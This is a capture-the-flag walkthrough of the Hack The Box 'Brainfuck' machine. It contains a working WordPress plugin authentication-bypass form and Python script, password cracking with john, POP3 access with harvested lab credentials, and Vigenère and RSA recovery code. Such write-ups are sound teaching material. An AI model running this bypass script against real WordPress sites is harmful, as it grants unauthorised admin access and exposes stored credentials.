# Brainfuck

<figure><img src="/files/UjWWYr0W6DlhRg9Yt8Y6" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we scan the target for open ports and identify the services and versions running on them.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.17 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.92 scan initiated Sun Sep 11 19:33:46 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.050s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
110/tcp open  pop3
143/tcp open  imap
443/tcp open  https

# Nmap done at Sun Sep 11 19:34:13 2022 -- 1 IP address (1 host up) scanned in 26.61 seconds
```

{% endcode %}

Now that we know which ports are open, let's identify the services and versions running on them. The following command scans those ports in more depth and saves the result into a file:

> nmap -sC -sV -p22,25,110,143,443 10.10.10.17 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.92 scan initiated Sun Sep 11 19:35:23 2022 as: nmap -sCV -p22,25,110,143,443 -oN targeted 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.036s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: PIPELINING UIDL CAPA AUTH-RESP-CODE RESP-CODES USER SASL(PLAIN) TOP
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: IMAP4rev1 SASL-IR capabilities more LOGIN-REFERRALS LITERAL+ ENABLE ID have Pre-login listed post-login IDLE AUTH=PLAINA0001 OK
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| tls-nextprotoneg: 
|_  http/1.1
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after:  2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: nginx/1.10.0 (Ubuntu)
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 11 19:36:15 2022 -- 1 IP address (1 host up) scanned in 52.24 seconds
```

{% endcode %}

There is an *HTTPS* website on port *443*, and the TLS certificate that *nmap* pulled from it names `brainfuck.htb` as the common name plus two Subject Alternative Names, `www.brainfuck.htb` and `sup3rs3cr3t.brainfuck.htb`. The server most likely serves different content per virtual host, so let's map all three names to the target in the `/etc/hosts` file.

> nano /etc/hosts

```
# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.17 brainfuck.htb   www.brainfuck.htb   sup3rs3cr3t.brainfuck.htb
```

*whatweb* shows that the website is a *WordPress* site, version 4.7.3.

> whatweb https://brainfuck.htb

{% code overflow="wrap" %}

```
https://brainfuck.htb [200 OK] Bootstrap[4.7.3], Country[RESERVED][ZZ], Email[ajax-loader@2x.gif,orestis@brainfuck.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.10.0 (Ubuntu)], IP[10.10.10.17], JQuery[1.12.4], MetaGenerator[WordPress 4.7.3], Modernizr, PoweredBy[WordPress,], Script[text/javascript], Title[Brainfuck Ltd. &#8211; Just another WordPress site], UncommonHeaders[link], WordPress[4.7.3], nginx[1.10.0]
```

{% endcode %}

If we take a look at the website, we'll see a post made by the `admin` user saying that the *SMTP* service is available, and the message includes the `orestis@brainfuck.htb` email address.

<figure><img src="/files/536KuR8e5YN2PQ4GhG42" alt=""><figcaption></figcaption></figure>

The `sup3rs3cr3t.brainfuck.htb` virtual host shows a forum page.

<figure><img src="/files/6habjoXo7xpAJn8PrMpH" alt=""><figcaption></figcaption></figure>

Let's run *wpscan* to enumerate the *WordPress* site.

> wpscan --url https://brainfuck.htb -e vp --disable-tls-checks -o wpScan

* `--url` **URL** of the WordPress site.
* `-e vp` enumerate **vulnerable plugins**.
* `--disable-tls-checks` **disables SSL/TLS** certificate verification, needed here because the site's certificate does not validate.
* `-o` save result to a **file**.

```
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Mon Sep 12 00:20:20 2022

Interesting Finding(s):
...
[i] Plugin(s) Identified:

[+] wp-support-plus-responsive-ticket-system
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 ...
```

## Exploitation

There is one plugin installed, `wp-support-plus-responsive-ticket-system`, in version `7.1.3`. Let's search for known vulnerabilities in that version.

> searchsploit wordpress plus responsive ticket 7.1.3

```
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation                                                | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection                                                       | php/webapps/40939.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

The privilege escalation entry (`41006.txt`) is really an authentication bypass: the plugin's `loginGuestFacebook` action, reachable by anyone through `admin-ajax.php`, takes a username from the POST body and sets the WordPress authentication cookie for that account without ever checking a password. All we need is a page that posts a username to that action. First, create an `index.html` file with the following form.

> nano index.html

```
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="admin">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>
```

Now serve the current directory with PHP's built-in web server on port *1234* (any static web server would do; the form only needs to be rendered by the browser).

> php -S localhost:1234

* `-S` run with built-in **web server**.

Open `http://localhost:1234` in the browser and press the `Login` button. The browser submits the form to `brainfuck.htb`, and the `Set-Cookie` header in the response stores the `wordpress_logged_in_*` session cookie for that domain in the browser.

<figure><img src="/files/fdf4fYg0ambAA2pzZ50t" alt=""><figcaption></figcaption></figure>

If we access the `/wp-admin` directory, we'll be able to see the *WordPress* dashboard.

<figure><img src="/files/t5nqV8N3Uy9h2xSzRVHb" alt=""><figcaption></figcaption></figure>
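The same bypass, scripted. This is an added example, not the writeup's HTML form or the Exploit-DB entry: it posts the same three fields the form does, reports whether WordPress answered with a `wordpress_logged_in_*` session cookie, and reuses the cookie jar to fetch `/wp-admin/`. The host name is the lab target from this writeup; skipping certificate validation and the 10 second timeout are assumptions.

```python
"""Scripted loginGuestFacebook authentication bypass (added example)."""
import ssl
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

TARGET = "https://brainfuck.htb"          # lab host from the writeup (assumption: no custom port)
AJAX_PATH = "/wp-admin/admin-ajax.php"    # WordPress AJAX entry point used by the plugin


def bypass_payload(username: str) -> bytes:
    """The fields the HTML form posts. The vulnerable handler only acts on
    `username`; `email` is never validated, so any value works."""
    return urllib.parse.urlencode({
        "username": username,
        "email": "sth",
        "action": "loginGuestFacebook",
    }).encode()


def wp_session_cookies(cookie_names) -> list:
    """WordPress marks a logged-in browser with a cookie named
    wordpress_logged_in_<hash>. If the POST response sets one, the plugin
    issued an authenticated session for the user we named, with no password."""
    return [n for n in cookie_names if n.startswith("wordpress_logged_in_")]


def _cookie_opener(insecure: bool):
    """Cookie-aware opener. `insecure` skips certificate validation for the
    lab's untrusted certificate (the same idea as wpscan --disable-tls-checks)."""
    jar = CookieJar()
    ctx = ssl._create_unverified_context() if insecure else ssl.create_default_context()
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(jar),
        urllib.request.HTTPSHandler(context=ctx),
    )
    return jar, opener


def login_as(username: str, base_url: str = TARGET, insecure: bool = True):
    """POST the bypass payload; return (opener holding the cookies, auth cookie names)."""
    jar, opener = _cookie_opener(insecure)
    req = urllib.request.Request(base_url + AJAX_PATH,
                                 data=bypass_payload(username), method="POST")
    with opener.open(req, timeout=10) as resp:
        resp.read()  # body is irrelevant; the Set-Cookie header is what matters
    return opener, wp_session_cookies(c.name for c in jar)


if __name__ == "__main__":
    opener, auth = login_as("admin")
    if not auth:
        raise SystemExit("no wordpress_logged_in_* cookie set; target not vulnerable?")
    print("session cookies:", auth)
    # With the cookie in the jar, the dashboard should render instead of redirecting to wp-login.php
    with opener.open(TARGET + "/wp-admin/", timeout=10) as resp:
        print("/wp-admin/ ->", resp.status)
```

The check on the cookie name is the useful part when testing other WordPress installs for the same plugin bug: a `200` on `/wp-admin/` alone can be misleading, but a `wordpress_logged_in_*` cookie handed back for a username you never authenticated is unambiguous.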

I tried ways to get remote command execution, like modifying the `404.php` file, or uploading a custom plugin, but none of those worked. But if we go to the Plugins section, we'll see one called `Easy WP SMTP`.

<figure><img src="/files/2iYFGjP5jRGmeVMKbrcq" alt=""><figcaption></figcaption></figure>

In the Settings option, we'll see that the emails are sent by `orestis@brainfuck.htb`.

<figure><img src="/files/pxwclV44tPwrf0djUmVu" alt=""><figcaption></figcaption></figure>

But the plugin settings also store the SMTP credentials: the username `orestis` and the password `kHGuERB29DNiNE`.

<figure><img src="/files/VD58DJ2kVdAx3Oqx7dKL" alt=""><figcaption></figcaption></figure>

Now that we have mail credentials, let's check the `orestis` mailbox through the *POP3* service (Dovecot) on port *110*.

> nc 10.10.10.17 110

```
+OK Dovecot ready.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
list
+OK 2 messages:
1 977
2 514
.
```

There are two emails. The first one just says that the *WordPress* site is available.

> retr 1

```
+OK 977 octets
Return-Path: <www-data@brainfuck.htb>
X-Original-To: orestis@brainfuck.htb
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 33)
        id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <wordpress@brainfuck.htb>
Message-ID: <00edcd034a67f3b0b6b43bab82b0f872@brainfuck.htb>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Your new WordPress site has been successfully set up at:

https://brainfuck.htb

You can log in to the administrator account with the following information:

Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php

We hope you enjoy your new site. Thanks!

--The WordPress Team
https://wordpress.org/
.
```

But the second one contains another set of credentials.

> retr 2

```
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
        id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards
.
```

These credentials work on the login page of the forum at `sup3rs3cr3t.brainfuck.htb`.

<figure><img src="/files/rn3zwJQDvxPZ7vZW8vRH" alt=""><figcaption></figcaption></figure>

Now we can see three discussions.

<figure><img src="/files/52iDd8tjV5xozlaxKDHh" alt=""><figcaption></figcaption></figure>

The `Key` discussion looks encrypted: the messages keep their spacing and punctuation while the letters are scrambled, which points to a classical letter-substitution cipher rather than modern encryption.

<figure><img src="/files/qVdAj82fLw0fqiDjgosl" alt=""><figcaption></figcaption></figure>

It could be the *Vigenère* cipher. One message in particular looks like it contains a URL: the `://` and `/` separators survive because the cipher only transforms letters.

<figure><img src="/files/HB0DjLNNcW0qJwG7eAWO" alt=""><figcaption></figcaption></figure>

Let's use [dcode.fr](https://www.dcode.fr/vigenere-cipher) to decode the message. Paste the message, and press on `AUTOMATIC DECRYPTION`.

<figure><img src="/files/6sWs8JSu7R9G7UcPtiM4" alt=""><figcaption></figcaption></figure>

In the results, we'll see a link to a private SSH key.

<figure><img src="/files/B7nlpQ5Sp6cF1HEzPwzW" alt=""><figcaption></figcaption></figure>
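The automatic decryption above works because the forum text is long enough for statistical analysis. When it is not, a known piece of plaintext (a fixed signature line is the classic case) gives the key directly, since for Vigenère each key letter is just cipher letter minus plain letter. The following is an added example, not the writeup's method and not the forum text: the key `POLYALPHA`, the message and its signature are constructed for the demonstration. It implements the cipher the way dcode does (letters only, non-letters passed through), recovers the keystream from a crib, and rotates it back to the real key when the crib sits at the end of the message.

```python
"""Vigenère decryption and known-plaintext key recovery (added example)."""
import string

ALPHABET = string.ascii_uppercase


def _is_letter(ch: str) -> bool:
    return ch in string.ascii_letters


def _shift(text: str, key: str, decrypt: bool) -> str:
    """Apply the Vigenère table to ASCII letters only. Spaces, punctuation and
    the ':' and '/' of a URL are copied through and do not consume a key letter,
    which is how the classic cipher and dcode treat them."""
    if not key or not key.isalpha():
        raise ValueError("key must be letters only")
    out, k = [], 0
    for ch in text:
        if _is_letter(ch):
            offset = ALPHABET.index(key[k % len(key)].upper())
            if decrypt:
                offset = -offset
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + offset) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def vigenere_encrypt(plaintext: str, key: str) -> str:
    return _shift(plaintext, key, decrypt=False)


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    return _shift(ciphertext, key, decrypt=True)


def recover_keystream(ciphertext: str, crib: str, offset: int = 0) -> str:
    """Known-plaintext attack: if `crib` is the plaintext of the letters starting
    `offset` letters into the message, key letter = (cipher - plain) mod 26."""
    c = [ch for ch in ciphertext if _is_letter(ch)][offset:]
    p = [ch for ch in crib if _is_letter(ch)]
    if len(p) > len(c):
        raise ValueError("crib runs past the end of the ciphertext")
    return "".join(ALPHABET[(ALPHABET.index(cc.upper()) - ALPHABET.index(pp.upper())) % 26]
                   for cc, pp in zip(c, p))


def shortest_period(stream: str) -> str:
    """Smallest repeating unit consistent with the keystream. If the crib was
    shorter than the key, this is only a fragment of the key."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def recover_key_from_tail(ciphertext: str, known_tail: str) -> str:
    """Recover the key when the END of the plaintext is known (a fixed signature).
    The keystream we read starts mid-key, so rotate it back to key position 0."""
    total = sum(_is_letter(ch) for ch in ciphertext)
    offset = total - sum(_is_letter(ch) for ch in known_tail)
    unit = shortest_period(recover_keystream(ciphertext, known_tail, offset))
    n = len(unit)
    return "".join(unit[(i - offset) % n] for i in range(n))


# Constructed demo input (not the forum post): a message ending with a fixed
# signature, encrypted under a key we then pretend not to know.
DEMO_KEY = "POLYALPHA"
DEMO_PLAINTEXT = ("The new key is at https://example.invalid/files/id_rsa\n"
                  "Regards, Admin")
DEMO_CIPHERTEXT = vigenere_encrypt(DEMO_PLAINTEXT, DEMO_KEY)

if __name__ == "__main__":
    key = recover_key_from_tail(DEMO_CIPHERTEXT, "Regards, Admin")
    print("recovered key:", key)
    print(vigenere_decrypt(DEMO_CIPHERTEXT, key))
```

The caveat to remember: the crib must contain at least as many letters as the key, and ideally more, otherwise `shortest_period` returns a fragment and the rest of the message decrypts to garbage. Once the key is out, every other post in the thread decrypts with the same `vigenere_decrypt` call.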

Download the `id_rsa` file from the link. If we take a look at the key, we'll see that it is protected with a passphrase. Let's try to crack it with *john*. First, convert the key into a hash format john understands and save it to the `id_rsa.hash` file.

> ssh2john id_rsa > id_rsa.hash

Then crack it with john using the rockyou wordlist.

> john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

```
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia!       (id_rsa)     
1g 0:00:00:13 DONE (2022-09-12 01:35) 0.07490g/s 933364p/s 933364c/s 933364C/s 3poulakia!..3pornuthin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

Finally, restrict the permissions of the `id_rsa` file (ssh refuses to use a private key that other users can read), then get a shell as the `orestis` user with the cracked passphrase and grab the user flag.

> chmod 600 id_rsa
>
> ssh -i id_rsa orestis@10.10.10.17

```
Enter passphrase for key 'id_rsa': 3poulakia!
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


You have mail.
Last login: Wed May  3 19:46:00 2017 from 10.10.11.4
orestis@brainfuck:~$ whoami
orestis
orestis@brainfuck:~$ cat user.txt 
2c11cfbc5b959f73ac15a3310bd097c9
```

## Privilege Escalation

If we look in the home directory, we'll see a file called `encrypt.sage` (a SageMath script) with the following code. It reads the root flag, turns its ASCII bytes into an integer and encrypts that integer with textbook RSA, but it also writes the primes `p` and `q` and the exponent `e` to a debug file.

> cat encrypt.sage

```python
nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)



c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
```

There is also the `debug.txt` file with the values of the `p`, `q` and `e` variables.

> cat debug.txt

```
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
```

And the `output.txt` file, which contains the ciphertext `c`: the contents of `/root/root.txt` encrypted.

> cat output.txt

```
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
```

We have all the values needed to recover the root flag: with `p` and `q` known, `phi = (p-1)*(q-1)`, the private exponent is `d = e^-1 mod phi`, and the plaintext is `m = c^d mod n`. Go to [cryptool.org](https://www.cryptool.org/en/cto/rsa-step-by-step.html), and put the values of `p` and `q`.

<figure><img src="/files/eu4U4xH8As0dKzDOPeJN" alt=""><figcaption></figcaption></figure>

Then, paste the value of `e`.

<figure><img src="/files/ETdBRf3oF4YDda3ef9nO" alt=""><figcaption></figcaption></figure>

And the encrypted flag in the `Ciphertext` field. Make sure the arrow is pointing up.

<figure><img src="/files/AjKeqDt0WjxFdDjfZHbE" alt=""><figcaption></figcaption></figure>

The result is the flag as an integer (the script converted the flag's ASCII bytes to hex and then to an integer), so convert it back to hexadecimal.

> python3 -c "print(hex(24604052029401386049980296953784287079059245867880966944246662849341507003750))"

```
0x3665666331613564626238393034373531636536353636613330356262386566
```

Finally, decode the hex string back to ASCII to get the root flag.

> echo "0x3665666331613564626238393034373531636536353636613330356262386566" | xxd -r -p

```
6efc1a5dbb8904751ce6566a305bb8ef
```
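The web form hides what is actually a three-line computation. The following is an added example, not the writeup's method: it does the same RSA recovery offline with Python's built-in big integers, using the `p`, `q`, `e` and `c` values from `debug.txt` and `output.txt` above, and folds the hex-and-`xxd` step into a single integer-to-bytes conversion. The Fermat primality check and the re-encryption check are extra sanity checks that I added; they catch a mistyped digit before it produces silent garbage.

```python
"""RSA decryption when the prime factors have leaked (added example)."""
from math import gcd

# Values copied from debug.txt (p, q, e) and output.txt (c) on the target.
P = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
Q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
E = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
C = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182


def fermat_probable_prime(n: int) -> bool:
    """Cheap check that a leaked value really is prime (Fermat test with fixed
    bases). Good enough to catch a transcription error, not a Miller-Rabin substitute."""
    return n > 3 and all(pow(a, n - 1, n) == 1 for a in (2, 3, 5, 7))


def rsa_private_exponent(p: int, q: int, e: int) -> int:
    """d = e^-1 mod phi(n). Knowing p and q is all the 'private key' there is."""
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    return pow(e, -1, phi)   # modular inverse (Python 3.8+)


def rsa_decrypt_int(p: int, q: int, e: int, c: int) -> int:
    """m = c^d mod n, followed by a round-trip check m^e mod n == c."""
    n = p * q
    m = pow(c, rsa_private_exponent(p, q, e), n)
    if pow(m, e, n) != c:
        raise ValueError("decryption does not re-encrypt to c; check the input values")
    return m


def int_to_ascii(m: int) -> str:
    """Undo Integer(int(password.encode('hex'), 16)) from encrypt.sage: the
    big-endian bytes of the plaintext integer are the original ASCII characters.
    This replaces the separate hex() and xxd -r -p steps."""
    return m.to_bytes((m.bit_length() + 7) // 8, "big").decode("ascii")


def recover_flag(p: int, q: int, e: int, c: int) -> str:
    for name, value in (("p", p), ("q", q)):
        if not fermat_probable_prime(value):
            raise ValueError(f"{name} is not prime; the leaked values are wrong")
    return int_to_ascii(rsa_decrypt_int(p, q, e, c))


if __name__ == "__main__":
    print(recover_flag(P, Q, E, C))
```

Two things this makes visible that the form does not. The script's real weakness is operational, not mathematical: `debug.txt` leaks the factorisation, and with `p` and `q` in hand there is nothing left to break. It is also textbook RSA with no padding, so the plaintext integer is the raw flag bytes and converts back without any parsing.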

